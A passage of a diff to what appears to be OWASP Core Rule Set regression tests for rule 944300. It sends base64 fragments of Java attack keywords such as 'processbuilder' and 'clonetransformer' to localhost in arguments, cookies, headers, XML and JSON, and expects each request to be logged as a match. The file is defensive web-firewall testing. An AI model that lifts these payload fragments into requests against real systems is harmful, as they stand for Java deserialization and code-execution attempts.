data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword 
HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword 
Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" 
+ version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 77 desc: "Content-Type application/json arg name includes 
keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 